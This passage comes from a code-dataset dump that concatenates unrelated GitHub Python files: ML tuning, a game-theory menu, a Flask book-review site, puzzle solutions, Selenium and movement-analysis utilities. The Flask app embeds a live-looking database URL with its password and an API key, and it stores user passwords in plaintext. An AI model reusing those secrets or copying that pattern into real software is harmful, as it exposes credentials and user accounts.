n_jobs=FLAGS.num_workers)\n\n # print the best studies\n print(\"Number of finished trials: \", len(study.trials))\n print(\"Best trial:\")\n trial = study.best_trial\n\n print(\" Value: {}\".format(trial.value))\n print(\" Params: \")\n for key, value in trial.params.items():\n print(\" {}: {}\".format(key, value))\n\n # visualize optimization with optuna\n # os.makedirs(f'models/{study.study_name}' , exist_ok=True)\n # fig = plot_contour(study)\n # fig.write_image(f'models/{study.study_name}/opt.png')\n # try:\n # fig = plot_param_importances(study)\n # fig.write_image(f'models/{study.study_name}/opt_hp_importance.png')\n # except:\n # print('Hparam importance plot failed.')\n # pickle.dump(trial.params, open(f'models/{study.study_name}/best_params.pkl', 'wb'))\n\n # get the test metrics\n df = objective(trial, x_train, y_train, x_val, y_val, x_test, y_test, FLAGS.model, FLAGS.feature, detail=True)\n metrics_df.append(df)\n \n metrics_df = pd.concat(metrics_df)\n metrics_df.to_csv(f'trained_results/{study.study_name}.csv', index=False)\n \n vmap = {\n 'min': 'OPV_Min',\n 'fp': 'DA_FP_radius_3_nbits_512',\n 'brics': 'DA_tokenized_BRICS',\n 'selfies': 'DA_SELFIES',\n 'smiles': 'DA_SMILES',\n 'bigsmiles': 'DA_BigSMILES',\n 'graph': 'DA_gnn',\n 'homolumo': 'HOMO_D_eV,LUMO_D_eV,HOMO_A_eV,LUMO_A_eV',\n 'mordred': 'mordred',\n 'pca_mordred': 'pca_mordred'\n }\n \n summary_df = pd.DataFrame(\n {\n 'Dataset': vmap[FLAGS.dataset],\n 'num_of_folds': 5,\n 'Features': vmap[FLAGS.feature],\n 'Targets Model': 'calc_PCE_percent',\n 'r_mean': metrics_df['r'].mean(),\n 'r_std': metrics_df['r'].std(),\n 'r2_mean': metrics_df['r2'].mean(),\n 'r2_std': metrics_df['r2'].std(),\n 'rmse_mean': metrics_df['rmse'].mean(),\n 'rmse_std': metrics_df['rmse'].std(),\n 'mae_mean': metrics_df['mae'].mean(),\n 'mae_std': metrics_df['mae'].std(),\n 'num_of_data': len(metrics_df)\n }, index=[0]\n )\n \n summary_df.to_csv(f'trained_results/{study.study_name}_summary.csv', index=False)\n\n # 
print()\n\n","repo_name":"stanlo229/ml_for_opvs","sub_path":"gary/optimize.py","file_name":"optimize.py","file_ext":"py","file_size_in_byte":19228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"13857296283","text":"# Translation of the Code created by Sanjin Dedic creator of Robotix.com.au\n# Class Game theory - Ph.D in Economics UAM\n# Confesar o Mentir\n\nimport AIsimulation, AhumanGame, SiempreConfesar, SiempreMentir, titForTat, AleatorioBasic, ConfesarAleatorio, MentirAleatorio, \\\n Resentido, pavlov, ES, myStrategy\n\nchoices = {'1-SiempreConfesar', '2-SiempreMentir', '3-titForTat', '4-AleatorioBasic', '5-ConfesarAleatorio',\n '6-MentirAleatorio', '7-Resentido', '8-pavlov', '9-ES', '10-myStrategy'}\n\nstrategies = {1: SiempreConfesar, 2: SiempreMentir, 3: titForTat, 4: AleatorioBasic, 5: ConfesarAleatorio, 6: MentirAleatorio,\n 7: Resentido, 8: pavlov, 9: ES, 10: myStrategy}\n\nprint('Estas son las opciones del juego')\nprint('presiona 1 para probar una estrategia contra todas las demas estrategias ')\nprint('presiona 2 para jugar con una estrategia de tu elección ')\nchoice = int(input())\n\nif choice == 1:\n print('Lista de estrategias ')\n print(choices)\n num = int(input('Escoge la estrategia por su numero '))\n strategy = strategies[num]\n AIsimulation.testStrategy(strategy, 20)\n\nif choice == 2:\n print('Contra quien quieres jugar? ')\n print(choices)\n num = int(input('Escoga la estrategia por su numero '))\n strategy = strategies[num]\n rounds = int(input('Cuantos rounds quieres jugar?: '))\n AhumanGame.play(strategy, rounds)\n","repo_name":"DanVillalpando/Game-Theory","sub_path":"Prisoners_dilemma/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73495349530","text":"import os\n\nfrom flask import Flask, session, render_template, request, redirect, url_for, flash, message_flashed\nfrom flask_session import Session\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nimport requests\nfrom bs4 import BeautifulSoup\nimport xml.etree.ElementTree as ET\n\napp = Flask(__name__)\n\n# Check for environment variable\n\"\"\"if not (\"DATABASE_URL\"):\n raise RuntimeError(\"DATABASE_URL is not set\")\"\"\"\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n\nDATABASE_URL = \"postgres://ebpharyyuilerk:7189355070df9d885b5e3f7a1f24ad7518e9bc392dce3dd05e3f0f5ff8adca0c@ec2-54-75-246-118.eu-west-1.compute.amazonaws.com:5432/de6d4r723rdhcc\"\n# Set up database\nengine = create_engine(DATABASE_URL)\ndb = scoped_session(sessionmaker(bind=engine))\n\nclass Book():\n def __init__(self,isbn,title,author):\n self.isbn = isbn\n self.title = title\n self.author = author\n def __str__(self):\n return (f'{self.isbn} {self.author} {self.title}')\nclass Review():\n def __init__(self,username,comment,rating,isbn):\n self.username = username\n self.comment = comment\n self.rating = rating\n self.isbn = isbn\n\n@app.route(\"/\")\ndef index():\n if session.get('username') == None:\n flash('You have to login')\n return redirect(url_for('login'))\n\n username = session['username']\n books = db.execute(\"SELECT id, isbn, author, title FROM books\").fetchall()\n\n first_books = []\n count = 0\n for book in books:\n first_books.append(book)\n count+=1\n if count == 20:\n break\n\n 
return render_template('home.html',username=username,books=books,first_books=first_books)\n\n#Register\n@app.route(\"/register\",methods=['GET','POST'])\ndef register():\n    if request.method == 'GET':\n        return render_template('register.html')\n\n    elif request.method == 'POST':\n        register_username = request.form.get('username')\n        register_password = request.form.get('password')\n        query = 'SELECT username FROM users WHERE username = :username'\n\n        if db.execute(query, {'username': register_username}).first():\n            flash('Username already exists')\n            return render_template('register.html')\n        else:\n            flash('Registration is successful')\n            db.execute(\"INSERT INTO users (username, password) VALUES (:username, :password)\",\n                       {\"username\": register_username, \"password\": register_password})\n            db.commit()\n            return redirect(url_for('login'))\n\n#Login\n@app.route(\"/login\",methods=['GET','POST'])\ndef login():\n    if request.method == 'GET':\n        return render_template('login.html')\n    elif request.method == 'POST':\n        login_username = request.form.get('username')\n        login_password = request.form.get('password')\n        session.clear()\n        user = db.execute(\"SELECT username,password FROM users WHERE (username = :username AND password = :password)\",\n                          {'username':login_username,'password':login_password}).first()\n        if user == None:\n            print('Invalid user')\n            flash('Wrong username or password')\n            return render_template('login.html')\n        else:\n            session['username'] = login_username\n            return redirect(url_for('index'))\n\n#Logout\n@app.route('/logout')\ndef logout():\n    session.clear()\n    return redirect('login')\n\n#Detail\n@app.route('/detail/<book_isbn>',methods=['GET','POST'])\ndef detail(book_isbn):\n    if session.get('username') == None:\n        return redirect(url_for('login'))\n    apikey = '9TI4CoND28j0LEXkBRApw'\n    url2 = f'https://www.goodreads.com/book/isbn/{book_isbn}?key={apikey}'\n    response = requests.get(url2)\n    soup = BeautifulSoup(response.content, \"lxml-xml\")\n    rating = soup.find('average_rating').text\n    year = (soup.find('publication_year').text)\n    rating_num = float(rating)\n    username = session['username']\n    book = db.execute(\"SELECT id, isbn, author, title FROM books WHERE isbn = :isbn \",{'isbn':book_isbn}).fetchone()\n\n    reviews = db.execute(\"SELECT * FROM reviews WHERE isbn=:isbn\",{'isbn':book_isbn}).fetchall()\n    user_check = db.execute(\"SELECT isbn FROM reviews WHERE username=:username AND isbn=:isbn\",{'username':username,'isbn':book_isbn}).fetchone()\n\n    control = False\n    if user_check == None:\n        control = True\n\n    review_list = []\n    for i in range(len(reviews)):\n        review = Review(reviews[i][0],reviews[i][1],reviews[i][2],reviews[i][3])\n        review_list.append(review)\n\n    if request.method == \"POST\":\n        if control == False:\n            flash(\"You can't review more than once\")\n        else:\n            review_username = username\n            review_comment = request.form.get('review')\n            review_rating = request.form.get('rating')\n\n            db.execute(\"INSERT INTO reviews (username,comment,rating,isbn) VALUES (:username,:comment,:rating,:isbn)\",\n                       {\"username\":review_username,\"comment\":review_comment,\"rating\":review_rating,\"isbn\":book_isbn})\n            db.commit()\n            flash('Your review was submitted')\n        return render_template('detail.html', book=book, username=username, rating=rating,rating_num=rating_num, review_list=review_list)\n    return render_template('detail.html',book=book,username=username,year=year,rating=rating,rating_num=rating_num,review_list=review_list)\n\n#Search\n@app.route('/search',methods=['GET','POST'])\ndef search():\n    if request.method == 
'POST':\n        search_key = request.form.get('query')\n        search = '%' + search_key + '%'\n        #query = db.execute(\"SELECT * FROM books WHERE title LIKE :search \",{\"search\":search}).fetchall()\n        query = db.execute(\"SELECT * FROM books WHERE (isbn LIKE :search OR title LIKE :search OR author LIKE :search)\",{\"search\":search}).fetchall()\n        '''db.execute(\"SELECT isbn,title,author,year FROM books WHERE title LIKE :query OR author LIKE :query OR isbn LIKE :query\",\n                      {\"query\": query.title()}).fetchall()'''\n        books = []\n        for index,book in enumerate(query):\n            book = Book(query[index][1], query[index][2], query[index][3])\n            books.append(book)\n        total_result = len(books)\n\n        if session.get('username'):\n            username = session['username']\n            return render_template('results.html',books=books,username=username,total_result=total_result)\n\n        else:\n            flash('You have to sign in to search a book')\n            return redirect('login')\n\n@app.route('/api/<isbn>')\ndef api(isbn):\n    apikey = '9TI4CoND28j0LEXkBRApw'\n    book = db.execute(\"SELECT * FROM books WHERE isbn=:isbn\",{'isbn':isbn}).fetchone()\n    try:\n        url2 = f'https://www.goodreads.com/book/isbn/{isbn}?key={apikey}'\n        response = requests.get(url2)\n        soup = BeautifulSoup(response.content, \"lxml-xml\")\n        rating = soup.find('average_rating').text\n        year = (soup.find('publication_year').text)\n        review_count = (soup.find('reviews_count').text)\n        return render_template('api.html',book = book,rating=rating,review_count=review_count,year=year)\n    except:\n        return render_template('404.html')\n","repo_name":"asarm/BookReviewApp","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":7335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5121136696","text":"import sys\nfrom heapq import heappush, heappop\n\ndef is_dest(position):\n    return position[0] == 0 \\\n        or position[1] == 0 \\\n        or position[0] == h-1 \\\n        or position[1] == w-1\n\ndef solution(ship_dict, graph):\n    priority_q = []\n    seen = set()\n    for i in range(h):\n        for j in range(w):\n            if graph[i][j] == 'E':\n                heappush(priority_q, (0, (i, j)))\n                seen.add((i,j))\n    while priority_q:\n        cost, position = heappop(priority_q)\n        if is_dest(position):\n            return cost\n        x, y = (position[0]-1, position[1])\n        if (x, y) not in seen:\n            seen.add((x,y))\n            heappush(priority_q, (cost + ship_dict[graph[x][y]], (x,y)))\n        x, y = (position[0], position[1]+1)\n        if (x, y) not in seen:\n            seen.add((x, y))\n            heappush(priority_q, (cost + ship_dict[graph[x][y]], (x,y)))\n        x, y = (position[0]+1, position[1])\n        if (x, y) not in seen:\n            seen.add((x, y))\n            heappush(priority_q, (cost + ship_dict[graph[x][y]], (x,y)))\n        x, y = (position[0], position[1]-1)\n        if (x, y) not in seen:\n            seen.add((x, y))\n            heappush(priority_q, (cost + ship_dict[graph[x][y]], (x,y)))\n    del seen\n    del priority_q\n\n\nif __name__ == '__main__':\n    f = sys.stdin\n    num_tests = int(f.readline())\n    for _ in range(num_tests):\n        k, w, h = map(int, f.readline().split(\" \"))\n        ship_dict = {}\n        for __ in range(k):\n            ship_code, ship_num = f.readline().split(\" \")\n            ship_dict[ship_code] = int(ship_num)\n\n        graph = []\n        for __ in range(h):\n            graph.append(f.readline().strip())\n\n        print(solution(ship_dict, graph))","repo_name":"leo-du/fsociety-notebook","sub_path":"baseline/pacnw_2013/E_Escape/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9658908458","text":"from 
selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service as ChromeService\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n\nclass Singleton(type):\n def __init__(self, *args, **kwargs):\n self.__instance = None\n super().__init__(*args, **kwargs)\n\n def __call__(self, *args, **kwargs):\n if self.__instance is None:\n self.__instance = super().__call__(*args, **kwargs)\n return self.__instance\n else:\n return self.__instance\n\n\nclass SingletonWebDriver(metaclass=Singleton):\n __driver = None\n\n @classmethod\n def get_driver(cls, parameters=None):\n if cls.__driver is None:\n options = webdriver.ChromeOptions()\n if parameters is not None:\n for p in parameters:\n options.add_argument(p)\n cls.__driver = webdriver.Chrome(\n service=ChromeService(ChromeDriverManager().install()), options=options\n )\n return cls.__driver\n\n @classmethod\n def unassign_driver(cls):\n cls.__driver = None\n","repo_name":"KonradCe/a1qa_L1_task2","sub_path":"singleton_webdriver.py","file_name":"singleton_webdriver.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26726788905","text":"\"\"\"\nThis file is responsible for creating basic ncaa seeds and for creating the outcome 'result'\n\"\"\"\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nfrom sklearn.linear_model import LogisticRegression\nimport matplotlib.pyplot as plt\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import GridSearchCV\n\ndef seed_to_int(seed):\n\t#Get just the digits from the seeding. Return as int\n\ts_int = int(seed[1:3])\n\treturn s_int\n\n#data_dir = '../input/'\ndef make_seeds():\n\tprint(\"loading data..\")\n\tdf_seeds = pd.read_csv('data/DataFiles/NCAATourneySeeds.csv')\n\tdf_tour = pd.read_csv('data/DataFiles/NCAATourneyCompactResults.csv')\n\n\tdf_seeds['seed_int'] = df_seeds.Seed.apply(seed_to_int)\n\tdf_seeds.drop(labels=['Seed'], inplace=True, axis=1) # This is the string label\n\n\tdf_tour.drop(labels=['DayNum', 'WScore', 'LScore', 'WLoc', 'NumOT'], inplace=True, axis=1)\n\n\tprint(\"creating seeds...\")\n\tdf_winseeds = df_seeds.rename(columns={'TeamID':'WTeamID', 'seed_int':'WSeed'})\n\tdf_lossseeds = df_seeds.rename(columns={'TeamID':'LTeamID', 'seed_int':'LSeed'})\n\tdf_dummy = pd.merge(left=df_tour, right=df_winseeds, how='left', on=['Season', 'WTeamID'])\n\tdf_concat = pd.merge(left=df_dummy, right=df_lossseeds, on=['Season', 'LTeamID'])\n\tdf_concat['SeedDiff'] = df_concat.WSeed - df_concat.LSeed\n\n\tdf_wins = pd.DataFrame()\n\tdf_wins = df_concat[['Season', 'WTeamID', 'LTeamID', 'SeedDiff']]\n\tdf_wins['Result'] = 1\n\n\tdf_losses = pd.DataFrame()\n\tdf_losses = df_concat[['Season', 'WTeamID', 'LTeamID']]\n\tdf_losses['SeedDiff'] = -df_concat['SeedDiff']\n\tdf_losses['Result'] = 0\n\n\tdf_predictions = pd.concat((df_wins, df_losses))\n\tprint(\"done\")\n\treturn(df_predictions)\n","repo_name":"stefanjwojcik/mm","sub_path":"notebooks/make_seeds.py","file_name":"make_seeds.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30095752877","text":"\"\"\"\r\n\n\nIn **Digital Cipher** , encoding is done by the simple addition of numbers in\nthe key and the corresponding characters on a string input.\n\nCreate a function that takes two arguments; a positive integer and a string\nand returns an encoded 
list of integers as message.\n\nAssign a unique number to each letter of the alphabet.\n\n a b c d e f g h i j k l m\n 1 2 3 4 5 6 7 8 9 10 11 12 13\n n o p q r s t u v w x y z\n 14 15 16 17 18 19 20 21 22 23 24 25 26\n\nThere are some variations on the rules of encipherment. One version of the\ncipher rules are outlined below:\n\n message = \"scout\"\n key = 1939\n \n digital_cipher(message, key) ➞ [20, 12, 18, 30, 21]\n\nWrite the corresponding number against each character:\n\n s c o u t\n 19 3 15 21 20\n\nAdd to each obtained digit consecutive digits from the key:\n\n s c o u t\n 19 3 15 21 20\n + 1 9 3 9 1\n ---------------\n 20 12 18 30 21\n\nSee the below example for a better understanding:\n\n message = \"masterpiece\"\n key = 1939\n \n digital_cipher(message, key) ➞ [14, 10, 22, 29, 6, 27, 19, 18, 6, 12, 8]\n \n m a s t e r p i e c e\n 13 1 19 20 5 18 16 9 5 3 5\n + 1 9 3 9 1 9 3 9 1 9 3\n --------------------------------\n 14 10 22 29 6 27 19 18 6 12 8\n\n### Examples\n\n digital_cipher(\"scout\", 1939) ➞ [20, 12, 18, 30, 21]\n \n digital_cipher(\"mubashir\", 1990) ➞ [14, 30, 11, 1, 20, 17, 18, 18]\n \n digital_cipher(\"edabit\", 100) ➞ [6, 4, 1, 3, 9, 20]\n\n### Notes\n\nLiked this challenge ? Let's decode your encrypted version\n[here](https://edabit.com/challenge/pyDemMDspSSFdWsh4)!!!\n\n\"\"\"\r\n\ndef digital_cipher(message, key):\n num_lst = []\n key_str = str(key)\n key_lst = []\n key_mask = []\n az_dict = {}\n az_lst = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n # create a key list\n for k in key_str:\n key_lst.append(int(k))\n # create dict to map letters to numbers\n num = 1\n for i in range(len(az_lst)):\n az_dict[az_lst[i]] = num\n num += 1\n # get list of int's from message\n for i in message:\n num_lst.append(az_dict[i])\n # create a key of the proper length\n key_length = len(key_lst)\n m_length = len(num_lst)\n key_mod = m_length % key_length\n key_int = int((m_length - key_mod) / key_length)\n key_leftover = []\n for i in range(key_mod):\n key_leftover.append(key_lst[i])\n for i in range(key_int):\n key_mask = key_mask + key_lst\n key_mask = key_mask + key_leftover\n # add the key_mask to the num_lst and return it\n cipher = []\n val = 0\n count = 0\n for i in num_lst:\n val = num_lst[count] + key_mask[count]\n cipher.append(val)\n count += 1\n return cipher\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"WFmZesxp2GXQcT8PE_22.py","file_name":"WFmZesxp2GXQcT8PE_22.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25858373417","text":"\nimport pptx\nfrom pptx.enum.shapes import MSO_SHAPE\n\ndef test_add_animation_single_shape():\n presentation = Presentation('path/to/presentation.pptx')\n slide = presentation.slides[0]\n shape = slide.shapes[0]\n add_animation(slide, shape)\n assert len(shape.animations) == 1\n\ndef test_add_animation_group_shape():\n presentation = Presentation('path/to/presentation.pptx')\n slide = presentation.slides[0]\n group_shape = slide.shapes.add_group()\n shape_1 = group_shape.shapes.add_shape(MSO_SHAPE.RECTANGLE, 0, 0, 100, 100)\n shape_2 = group_shape.shapes.add_shape(MSO_SHAPE.OVAL, 100, 100, 200, 200)\n add_animation(slide, group_shape)\n assert len(shape_1.animations) == 1\n assert len(shape_2.animations) == 
1\n","repo_name":"toddbenanzer/sandbox_utils","sub_path":"pptx_hierarchy_viz/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73742778332","text":"import numpy as np\nimport pandas as pd\nimport warnings\nfrom scipy.spatial import distance_matrix\nfrom scipy.spatial.distance import pdist, squareform\nimport tsfresh\nfrom shapely.geometry import Polygon\nimport matplotlib.pyplot as plt\nfrom fastdtw import fastdtw\nfrom scipy.spatial.distance import euclidean\nfrom .utils import presence_3d\nfrom functools import reduce\nimport st_clustering as stc\nfrom tqdm import tqdm\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom pandas.api.types import is_numeric_dtype\n\nfrom .feature_extraction import *\nfrom scipy.spatial import Voronoi, voronoi_plot_2d, ConvexHull, convex_hull_plot_2d, Delaunay, delaunay_plot_2d\n\n\ndef get_trajectories(data_groups):\n \"\"\"\n Obtain trajectories out of a grouped dictionary with multiple ids.\n :param data_groups: Grouped dictionary by animal_id.\n :return: Grouped dictionary by animal id, containing tuples of positions in 2d coordinate system.\n \"\"\"\n\n # create new dictionary\n trajectories = {}\n for aid in data_groups.keys():\n # add dict item, holding x-y tuples for the trajectories of each animal id\n trajectories[aid] = list(\n zip(data_groups[aid][\"x\"], data_groups[aid][\"y\"]))\n return trajectories\n\n\ndef dtw_matrix(preprocessed_data, path=False, distance=euclidean):\n \"\"\"\n Obtain dynamic time warping amongst all trajectories from the grouped animal-records.\n :param preprocessed_data: pandas Dataframe containing the movement records.\n :param path: Boolean to specify if matrix of dtw-path gets returned as well.\n :param distance: Specify which distance measure to use. Default: \"euclidean\". (ex. Alternatives: pdist, minkowski)\n :return: pandas Dataframe with distances between trajectories.\n \"\"\"\n data_groups = grouping_data(preprocessed_data)\n\n # get trajectory-dictionary with local function\n trajectories = get_trajectories(data_groups)\n\n # create empty np array with size, depending on number of tracked animals\n distance_matr = np.empty(\n (len([*trajectories.keys()]), len([*trajectories.keys()])))\n\n # create empty np list-array for paths with size, depending on number of tracked animals\n path_matr = np.empty(\n (len([*trajectories.keys()]), len([*trajectories.keys()])), dtype=list)\n\n # double-iterate over obtained trajectory dict\n for aid in tqdm(range(len([*trajectories.keys()])),position=0, desc=\"Calculating dynamic time warping\"):\n for aid2 in range(len([*trajectories.keys()])):\n # fill np array field with euclidean distance of respective trajectories, same for path field\n distance_matr[aid][aid2], path_matr[aid][aid2] = fastdtw(\n trajectories[[*trajectories.keys()][aid]],\n trajectories[[*trajectories.keys()][aid2]],\n dist=distance)\n # generate pandas df from distance array\n distance_df = pd.DataFrame(data=distance_matr,\n index=[*trajectories.keys()],\n columns=[*trajectories.keys()])\n if path:\n return distance_df, path_matr\n else:\n return distance_df\n\ndef compute_centroid_direction(data, colname=\"centroid_direction\", group_output=False, only_centroid=True):\n \"\"\"\n Calculate the direction of the centroid. 
Calculates centroid, if not in input data.\n :param pd DataFrame: DataFrame with x/y positional data and animal_ids, optionally include centroid\n :param colname: Name of the column. Default: centroid_direction.\n :param group_output: Boolean, defines form of output. Default: Animal-Level.\n :param only_centroid: Boolean in case we just want to compute the centroids. Default: True.\n :return: pandas DataFrame with centroid direction included\n \"\"\"\n # Handle centroid not in data\n if \"x_centroid\" not in data.columns or \"y_centroid\" not in data.columns:\n warnings.warn(\n 'x_centroid or y_centroid not found in data. Calculating centroid...'\n )\n data = centroid_medoid_computation(data, only_centroid=only_centroid)\n\n # Group into animals\n dat = grouping_data(data)\n\n with tqdm(total=100, position=0, desc=\"Computing centroid direction\") as pbar:\n pbar.update(10) # because compute_direction starts at 10% due to its call in extract_features\n dat = compute_direction(dat,\n pbar,\n param_x=\"x_centroid\",\n param_y=\"y_centroid\",\n colname=colname)\n\n cen_direction = regrouping_data(dat)\n\n if group_output == False:\n return cen_direction\n\n else:\n pol = cen_direction\n return pol.loc[pol.animal_id == list(set(pol.animal_id))[0],\n ['time', colname]].reset_index(drop=True)\n\n\ndef get_heading_difference(preprocessed_data):\n \"\"\"\n Calculate the difference in between the animal's direction and the centroid's direction for each timestep.\n The difference is measured by the cosine similarity of the two direction vectors. The value range is from -1 to 1,\n with 1 meaning animal and centroid having the same direction while -1 meaning they have opposite directions.\n :param preprocessed_data: Pandas Dataframe containing preprocessed animal records.\n :return: Pandas Dataframe containing animal and centroid directions as well as the heading difference.\n \"\"\"\n if \"direction\" not in preprocessed_data.columns:\n preprocessed_data = extract_features(preprocessed_data)\n\n if \"x_centroid\" not in preprocessed_data.columns or \"y_centroid\" not in preprocessed_data.columns:\n preprocessed_data = centroid_medoid_computation(preprocessed_data)\n # Obtain the centroid positions for each timestep, group into dictionary\n\n animal_dir = grouping_data(preprocessed_data)\n\n # Get the directions for each centroid for each timestep\n with tqdm(total=100,position=0, desc=\"Calculating heading difference\") as pbar:\n pbar.update(10) # because the method compute_direction() assumes 10% are already filled\n cen_dir = compute_direction(animal_dir,\n pbar,\n param_x=\"x_centroid\",\n param_y=\"y_centroid\",\n colname=\"centroid_direction\")\n\n directions = regrouping_data(cen_dir)\n # calculate cosine similarity of the centroids and the animals direction vector\n cos_similarities = [cosine_similarity(np.array([directions['direction'][i]]), np.array([directions['centroid_direction'][i]]))[0][0] for i in range(0, len(directions[\\\n 'direction']))] # cosine similarity for direction vectors of animal and centroid\n directions['heading_difference'] = cos_similarities\n return directions\n\n\ndef compute_polarization(preprocessed_data, group_output=False):\n \"\"\"\n Compute the polarization of a group at all record timepoints.\n More info about the formula: Here: https://bit.ly/2xZ8uSI and Here: https://bit.ly/3aWfbDv. 
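Concretely, for the N direction angles theta_i observed at a timestep, the code below evaluates polarization = (1/N) * sqrt((sum_i sin(theta_i))**2 + (sum_i cos(theta_i))**2), which ranges from 0 (fully dispersed headings) to 1 (fully aligned headings). 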
As the formula only takes angles as input,\n the polarization is calculated for 2d - Data by first calculating the direction angles of the different movers and afterwards by calculating the polarization.\n For 3-dimensional data for all two's-combinations of the three dimensions the polarization is calculated in the way described before for 2d-data,\n afterwards the mean of the three results is taken as result for the polarization.\n :param preprocessed_data: Pandas Dataframe with or without previously extracted features.\n :return: Pandas Dataframe, with extracted features along with a new \"polarization\" variable.\n \"\"\"\n\n def polarization(preprocessed_data, group_output):\n # convert to radians for polarization formula\n preprocessed_data['direction_angle'] = preprocessed_data['direction_angle'].apply(lambda x: math.radians(x))\n\n # Group by 'time'-\n data_time = preprocessed_data.groupby('time')\n\n # Dictionary to hold grouped data by 'time' attribute-\n data_groups_time = {}\n\n # Obtain polarization for each point in time\n for aid in data_time.groups.keys():\n data_groups_time[aid] = data_time.get_group(aid)\n data_groups_time[aid].reset_index(drop=True, inplace=True)\n data = (1 / len(data_groups_time[aid][\"direction_angle\"])) * np.sqrt(\n (sum(np.sin(data_groups_time[aid][\"direction_angle\"].astype(np.float64)))\n )**2 +\n (sum(np.cos(data_groups_time[aid][\"direction_angle\"].astype(np.float64)))\n )**2)\n\n data_groups_time[aid] = data_groups_time[aid].assign(polarization=data)\n\n # Regroup data into DataFrame\n polarization_data = regrouping_data(data_groups_time)\n\n # convert direction angle back to degrees\n polarization_data['direction_angle'] = polarization_data['direction_angle'].apply(lambda x: math.degrees(x))\n\n # If interested in fullstack output for each animal\n if group_output == False:\n return polarization_data\n\n # If only interested in group level output, return one line per timeslot\n else:\n pol = polarization_data\n return pol.loc[pol.animal_id == list(set(pol.animal_id))[0],\n ['time', 'polarization']].reset_index(drop=True)\n\n # Check if 3d\n if 'z' in preprocessed_data.columns:\n # if 3d calculate direction angle for all three two's-combinations of the three dimensions\n preprocessed_data = preprocessed_data.rename(columns={'z': 'zz'})\n preprocessed_data_1 = compute_direction_angle(preprocessed_data)\n preprocessed_data_2 = compute_direction_angle(preprocessed_data, param_x='x', param_y='zz')\n preprocessed_data_3 = compute_direction_angle(preprocessed_data, param_x='y', param_y='zz')\n polarizations = []\n # then calculate the polarization for each combination and take the mean as the final result\n for i in [preprocessed_data_1, preprocessed_data_2, preprocessed_data_3]:\n polarizations.append(polarization(i, group_output=group_output))\n data = [(polarizations[0]['polarization'][i] + polarizations[1]['polarization'][i] + polarizations[2]['polarization'][i])\n / 3 for i in range(len(polarizations[0]['polarization']))]\n polarization_data = polarizations[0]\n polarization_data = polarization_data.assign(polarization=data)\n return polarization_data\n\n # if data is 2d check if it already has direction angle calculated and afterwards calculate polarization\n else:\n if \"direction_angle\" not in preprocessed_data.columns:\n warnings.warn('calculating direction angle for first two dimensions, since not found in input!')\n preprocessed_data = compute_direction_angle(preprocessed_data)\n return polarization(preprocessed_data, group_output)\n 
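# direction_angle is already present, so the polarization can be computed directly\n        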
else:\n return polarization(preprocessed_data, group_output)\n\n\n\ndef voronoi_volumes(points):\n \"\"\"\n Function to calculate area in a voronoi-diagram. Used in function below.\n :param points: Nested list, indicating points with coordinates.\n :return: Volume for each point, infinite if area is not closed to each direction (usually outmost points).\n \"\"\"\n v = Voronoi(points)\n vol = np.zeros(v.npoints)\n for i, reg_num in enumerate(v.point_region):\n indices = v.regions[reg_num]\n if -1 in indices: # some regions can be opened\n vol[i] = np.inf\n else:\n vol[i] = ConvexHull(v.vertices[indices]).volume\n return vol\n\n\ndef get_spatial_objects(preprocessed_data, group_output=False):\n \"\"\"\n Function to calculate convex hull, voronoi diagram and delaunay triangulation objects and also volumes of the first two objects.\n Please visit https://docs.scipy.org/doc/scipy-0.14.0/reference/tutorial/spatial.html for detailed documentation of spatial attributes.\n :param preprocessed_data: Pandas Df, containing x and y coordinates.\n :param group_output: Boolean, default: False, If true, one line per time capture for entire animal group.\n :return: DataFrame either for each animal or for group at each time, containing convex hull and voronoi diagram area as well as convex hull, voronoi diagram and delaunay triangulation object.\n \"\"\"\n\n data_time = preprocessed_data.groupby('time')\n\n # Dictionary to hold grouped data by 'time' attribute-\n data_groups_time = {}\n\n for aid in tqdm(data_time.groups.keys(),position=0, desc=\"Calculating spatial objects\"):\n data_groups_time[aid] = data_time.get_group(aid)\n data_groups_time[aid].reset_index(drop=True, inplace=True)\n\n if len(data_groups_time[aid]) >= 3: # spatial objects need minimum 3 points in timestamp\n # Obtain shape objects\n conv_hull_obj = ConvexHull(data_groups_time[aid].loc[:, [\"x\", \"y\"]])\n voronoi_obj = Voronoi(data_groups_time[aid].loc[:, [\"x\", \"y\"]])\n delaunay_obj = Delaunay(data_groups_time[aid].loc[:, [\"x\", \"y\"]])\n\n # Calculate area based on objects right above\n conv_hull_vol = conv_hull_obj.volume\n voronoi_vol = voronoi_volumes(data_groups_time[aid].loc[:, [\"x\", \"y\"]])\n\n # Assign shapes to dataframe\n data_groups_time[aid] = data_groups_time[aid].assign(\n convex_hull_object=conv_hull_obj,\n 